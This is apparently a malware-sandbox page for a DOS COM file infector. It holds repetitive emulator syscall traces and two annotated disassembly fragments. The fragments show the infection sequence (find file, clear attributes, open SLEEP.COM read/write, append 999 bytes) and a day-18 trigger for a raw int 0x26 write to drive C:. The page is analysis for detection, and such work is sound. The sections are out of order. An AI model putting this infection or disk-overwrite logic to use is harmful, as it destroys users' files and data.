0x12bcf: mov di, si ; destination = source, i.e. an in-place pass; presumably a decrypt loop keyed by DX - TODO confirm
0x12bd1: int3 ; listing ends here; whether 0xCC is a real byte of the sample or a tool artefact cannot be told from this page
2018-12-25T12:28:38.558794176Z 68 PC: 12be3 | I/O control for devices (Set for = '����')
2018-12-25T12:28:38.56014178Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.561453476Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.563313606Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.564622643Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.565926149Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.56845022Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.569979919Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.571360849Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.587379848Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.58933535Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.591038913Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.592885321Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.59491405Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.596588374Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.598269748Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.600687788Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.602148369Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.603580632Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.605449575Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.60732613Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.609055343Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.611693621Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.613227714Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.61473744Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.621658295Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.624041794Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.626768951Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.63058025Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.632530268Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.634040295Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.641332822Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.642932345Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.644317418Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.654663431Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.656472926Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.658204585Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.66069872Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.662649171Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.664683758Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.666415119Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.671003693Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.672659205Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.674747322Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.676955347Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.678366401Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.679679875Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.681943854Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.683280665Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.684579003Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.686944566Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.688410196Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.689955064Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.691952463Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.693379878Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.694829544Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.699157458Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.700562641Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.701865541Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.703752412Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.705846667Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.707150835Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.709193713Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.710829501Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.71246516Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.715039979Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.716605349Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.718149384Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.720177462Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.721468273Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.722719924Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.725077768Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.726385452Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.72760194Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.729518677Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.73088621Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.732408384Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.734109245Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.735843299Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.737355887Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.739030788Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.740989409Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.742609105Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.744423786Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.74576775Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.747019721Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.748294587Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.749731604Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.750990788Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.752390302Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.754049803Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.755417746Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.756901605Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.758605302Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.760121331Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.761800054Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.763698466Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.765211449Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.766894011Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.768704048Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.76991209Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.771357619Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.773383099Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.775375946Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.776901145Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.779478392Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.781262998Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.783003423Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.785457726Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.78716228Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.788803024Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.791584398Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.79334221Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.795201742Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.79753259Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.800037322Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.801698216Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.803864202Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.805171116Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.806601229Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.808668661Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.810285866Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.812231867Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.814442525Z 68 PC: 12be3 | I/O control for devices (See above)
; Disassembly excerpt attached to the "Get time" trace row (sandbox emulator
; output, 16-bit real-mode code, linear addresses).
; The "PC" column of the trace is the address immediately after the int 0x21
; that raised the call (int at 0x12c15 -> row at PC 12c17, and so on), so the
; trace rows that follow this excerpt map one-to-one onto the int 0x21 below.
; Visible behaviour: keep the time value, search for a file, save and then
; clear its attributes, open it read/write. Clearing attributes right before a
; read/write open of an executable is a useful behavioural indicator for
; file-infector detection.
; bp-relative operands: bp presumably holds the code's run-time base offset;
; where it is set is not shown in this excerpt.
2018-12-25T12:28:38.815830051Z 44 PC: 12c04 | Get time 0x12c04: mov word ptr ds:[bp + 0x136], dx    ; store DX as returned by Get time (DOS API: DH = seconds, DL = hundredths) at [bp+0x136]
0x12c09: jmp 0x12c0b    ; jump to the very next instruction (no effect on control flow)
0x12c0b: mov ax, 0x4e00    ; AH = 0x4E: DOS "Find first file"
0x12c0e: mov cx, 0    ; attribute mask 0 for the search
0x12c11: lea dx, word ptr [bp + 0x1e8]    ; DX -> search pattern at [bp+0x1e8] (contents not shown here)
0x12c15: int 0x21    ; trace row: "Find first file" at PC 12c17
0x12c17: jae 0x12c1c    ; carry clear = a match was found, continue below
0x12c19: jmp 0x12d1f    ; no match: leave for 0x12d1f (outside this excerpt)
0x12c1c: push 0x4300    ; push/pop pair is equivalent to mov ax, 0x4300
0x12c1f: pop ax    ; AX = 0x4300: DOS "Get file attributes"
0x12c20: mov dx, 0x9e    ; 0x9E = 0x80 + 0x1E, the file-name field of a find-first result in the default DTA; assumes the DTA was not relocated
0x12c23: int 0x21    ; trace row: "Get or set file attributes" at PC 12c25
0x12c25: mov word ptr ds:[bp + 0x349], cx    ; save the attributes returned in CX at [bp+0x349]
0x12c2a: mov ax, 0x4301    ; AX = 0x4301: DOS "Set file attributes"
0x12c2d: mov cx, 0    ; new attributes = 0 (read-only/hidden/system cleared); DX is not reloaded here
0x12c30: int 0x21    ; trace row: "Get or set file attributes" at PC 12c32
0x12c32: mov ax, 0x3d02    ; AH = 0x3D open file, AL = 2: read/write access
0x12c35: mov dx, 0x9e    ; same file-name pointer as above
0x12c38: int 0x21    ; trace row: "Open file (Filename = 'SLEEP.COM')" at PC 12c3a
0x12c3a: push ax    ; keep AX (the handle on success); no carry check is visible before the excerpt ends
2018-12-25T12:28:38.817954638Z 78 PC: 12c17 | Find first file
2018-12-25T12:28:38.824513183Z 67 PC: 12c25 | Get or set file attributes
2018-12-25T12:28:38.830153946Z 67 PC: 12c32 | Get or set file attributes
2018-12-25T12:28:39.3073489Z 61 PC: 12c3a | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:28:39.319992627Z 63 PC: 12c49 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:28:39.326950425Z 87 PC: 12c94 | Get or set file date and time
2018-12-25T12:28:39.328710816Z 66 PC: 12ca7 | Move file pointer
2018-12-25T12:28:39.331691964Z 64 PC: 12cb4 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T12:28:39.334713445Z 64 PC: 12cd3 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:28:39.337619056Z 64 PC: 12ce0 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T12:28:39.341969795Z 66 PC: 12ceb | Move file pointer
2018-12-25T12:28:39.34360857Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.345285979Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.347665257Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.349440843Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.351077293Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.353312547Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.354909001Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.356611598Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.35901635Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.360576548Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.362248338Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.364819096Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.366272254Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.368059203Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.370573058Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.372509413Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.37415156Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.376574136Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.37855156Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.380174755Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.382724752Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.384047421Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.385371876Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.387488483Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.38889342Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.390194072Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.392318947Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.393852879Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.39556998Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.397939765Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.399890897Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.401614368Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.403943677Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.405904813Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.407530392Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.409327868Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.411636197Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.412986133Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.414495725Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.416679505Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.418394331Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.420201687Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.422729942Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.423945024Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.425251222Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.426781154Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.428116465Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.43094542Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.4324031Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.4337162Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.436136571Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.438214603Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.439962909Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.442437481Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.444506471Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.446209519Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.448639385Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.450645695Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.452333675Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.454975811Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.456653505Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.458706537Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.461007949Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.463313292Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.464686339Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.466778331Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.468423708Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.469799858Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.471765136Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.473926961Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.475356288Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.47765993Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.479296323Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.480946001Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.48319075Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.484789021Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.48643376Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.488688598Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.49030396Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.491920092Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.493891497Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.495350704Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.497003715Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.49949677Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.501109731Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.502803491Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.505103308Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.506696238Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.508331442Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.510721687Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.512005518Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.513269609Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.514916725Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.516562105Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.518137181Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.520200199Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.521782924Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.524306772Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.52640109Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.527986154Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.53033042Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.53264152Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.534446521Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.536746131Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.538675778Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.540290135Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.543153211Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.545500856Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.547082353Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.549409376Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.550994709Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.55254544Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.555089506Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.556494551Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.557853392Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.560064064Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.561459161Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.563158313Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.565256002Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.566925309Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.568488618Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.570580612Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.571925152Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.573221994Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:39.575117539Z 64 PC: 12cfb | Write file or device (Write 999 bytes on handle 5)
2018-12-25T12:28:39.584291685Z 87 PC: 12d0c | Get or set file date and time
2018-12-25T12:28:39.585716119Z 62 PC: 12d11 | Close file
2018-12-25T12:28:39.593792549Z 67 PC: 12d1f | Get or set file attributes
2018-12-25T12:28:39.603408172Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:28:39.609207529Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":18,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10628,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
; Disassembly excerpt attached to the "Get date" trace row (sandbox emulator
; output, 16-bit real-mode code, linear addresses). PC 12ba6 is the address
; right after the int 0x21 that performed the date query.
; Visible behaviour: a day-of-month check guarding a raw disk write through
; int 0x26, followed by the set-up of a 0x7c-iteration loop over [bp+0x165].
; The run configuration recorded on this page sets "Day":18, which equals the
; compared value 0x12, so this run takes the date-triggered path.
; Caveat: the call at 0x12bb3 targets 0x12bbb, which is not a listed
; instruction boundary (the listing has 0x12bba and 0x12bbc). The lines from
; 0x12bb8 to 0x12bba therefore look like data or padding decoded as code;
; treat them as unreliable.
2018-12-25T12:28:38.913319175Z 42 PC: 12ba6 | Get date 0x12ba6: cmp dl, 0x12    ; DL = day of month from Get date; 0x12 = 18
0x12ba9: jne 0x12bb2    ; any other day: skip the disk write
0x12bab: mov cx, 0xffff    ; CX for int 0x26: sector count, or 0xFFFF = parameter-block form on later DOS versions (TODO confirm which applies)
0x12bae: mov al, 2    ; AL = drive number for int 0x26; 2 = C:
0x12bb0: int 0x26    ; DOS absolute disk write, bypasses the file system; DX and DS:BX are not set in this excerpt
0x12bb2: popaw    ; restore all general registers; the matching save is not in this excerpt
0x12bb3: call 0x12bbb    ; routine entry at 0x12bbb (see caveat above about the listing around it)
0x12bb6: jmp 0x12be8    ; continue at 0x12be8 (outside this excerpt)
0x12bb8: nop    ; padding after the short jump
0x12bb9: pop ss    ; probably data, not code (see caveat)
0x12bba: pushaw    ; decode overlaps the call target 0x12bbb (see caveat)
0x12bbc: mov dx, word ptr ds:[bp + 0x136]    ; load the word kept at [bp+0x136]; presumably a key or seed for the loop below (TODO confirm)
0x12bc1: jmp 0x12bc8    ; skip the terminate sequence at 0x12bc4
0x12bc3: nop    ; padding after the short jump
0x12bc4: mov ah, 0x4c    ; AH = 0x4C: DOS "Terminate with return code"
0x12bc6: int 0x21    ; not reached from the jump at 0x12bc1
0x12bc8: mov cx, 0x7c    ; loop count 0x7c = 124; the trace shows a run of exactly 124 consecutive calls at PC 12be3 before the 999-byte write
0x12bcb: lea si, word ptr [bp + 0x165]    ; SI -> buffer at [bp+0x165]
0x12bcf: mov di, si    ; DI = SI: source and destination are the same buffer, consistent with an in-place transform (presumably decryption)
0x12bd1: int3    ; breakpoint opcode; the excerpt ends here, so whether it is an anti-debug step or a listing artefact cannot be told
2018-12-25T12:28:38.920818991Z 68 PC: 12be3 | I/O control for devices (Set for = '��|')
2018-12-25T12:28:38.922473718Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.924113464Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.930291056Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.931757403Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.933182966Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.934902579Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.936447527Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.937837178Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.939136411Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.940665975Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.942238303Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.94381675Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.945811412Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.94732138Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.948800381Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.951091179Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.952606701Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.954870607Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.956912262Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.958468916Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.960071036Z 68 PC: 12be3 | I/O control for devices (See above)
2018-12-25T12:28:38.962319329Z 68 PC: 12be3 | I/O control for devices (See above)